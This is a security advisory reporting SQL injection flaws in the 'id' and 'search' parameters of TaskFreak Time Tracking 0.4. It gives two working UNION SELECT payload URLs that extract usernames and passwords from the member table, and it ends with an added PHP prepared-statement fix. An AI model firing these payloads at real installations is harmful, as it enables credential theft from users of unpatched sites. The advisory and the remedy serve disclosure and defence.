TaskFreak Time Tracking 0.4 Multiple SQL Injection Vulnerabilities

 Name              TaskFreak Time Tracking
 Vendor            http://www.taskfreak.com
 Versions Affected 0.4

 Author            Salvatore Fresta aka Drosophila
 Website           http://www.salvatorefresta.net
 Contact           salvatorefresta [at] gmail [dot] com
 Date              2010-29-06

X. INDEX

 I.    ABOUT THE APPLICATION
 II.   DESCRIPTION
 III.  ANALYSIS
 IV.   SAMPLE CODE
 V.    FIX

I. ABOUT THE APPLICATION

Web task manager and todo list.

II. DESCRIPTION

Some fields are not properly sanitised.

III. ANALYSIS

Summary:

 A) Multiple SQL Injection

A) Multiple SQL Injection

Some fields, such as search and id, are not properly sanitised and are vulnerable to SQL Injection. These bugs can be exploited in a post-authentication scenario by any user.

IV. SAMPLE CODE

A) Multiple SQL Injection

http://site/path/index.php?c=task&a=view&id=-1 UNION SELECT 1,CONCAT(username,0x3a,password),3,4,5,6,7,8,9,10,11,12 FROM member

http://site/path/index.php?c=Task&a=main&search=blablabla%25' UNION SELECT 1,CONCAT(username,0x3a,password),3,4,5,6,7,8,9,10,11,12 FROM member%23&go=1

V. FIX

No Fix.
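
Added example, not part of the original advisory and not TaskFreak's code: one way to handle the id and search parameters named in section III with PDO prepared statements, so that request input is bound as data instead of being concatenated into the query. The task table, its columns, and the function names viewTask and searchTasks are assumptions, and an in-memory SQLite database stands in for the application's database.

```php
<?php
// Added example: hypothetical schema and function names, not TaskFreak's code.
// In-memory SQLite keeps the sample self-contained; the same PDO calls
// apply to other PDO drivers.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE task (id INTEGER PRIMARY KEY, title TEXT)');
$db->exec('CREATE TABLE member (username TEXT, password TEXT)');
$db->exec("INSERT INTO task (id, title) VALUES (1, 'Write report'), (2, '100% coverage')");
$db->exec("INSERT INTO member VALUES ('admin', 'constructed-hash')"); // constructed row

// id: accept only a positive integer, then bind it with an integer type.
function viewTask(PDO $db, $rawId): ?array
{
    $id = filter_var($rawId, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return null; // anything that is not a positive integer is rejected
    }
    $stmt = $db->prepare('SELECT id, title FROM task WHERE id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// search: bind the term as a string parameter and escape the LIKE
// wildcards so that % and _ typed by the user match literally.
function searchTasks(PDO $db, string $term): array
{
    $escaped = str_replace(['!', '%', '_'], ['!!', '!%', '!_'], $term);
    $stmt = $db->prepare("SELECT id, title FROM task WHERE title LIKE :term ESCAPE '!'");
    $stmt->bindValue(':term', '%' . $escaped . '%', PDO::PARAM_STR);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Constructed inputs: a valid id, a non-numeric id, a literal percent
// sign, and a search term containing a quote and SQL keywords.
echo json_encode(viewTask($db, '1')), PHP_EOL;
echo json_encode(viewTask($db, '-1 UNION SELECT 1')), PHP_EOL;
echo json_encode(searchTasks($db, '%')), PHP_EOL;
echo json_encode(searchTasks($db, "report%' UNION SELECT 1")), PHP_EOL;
```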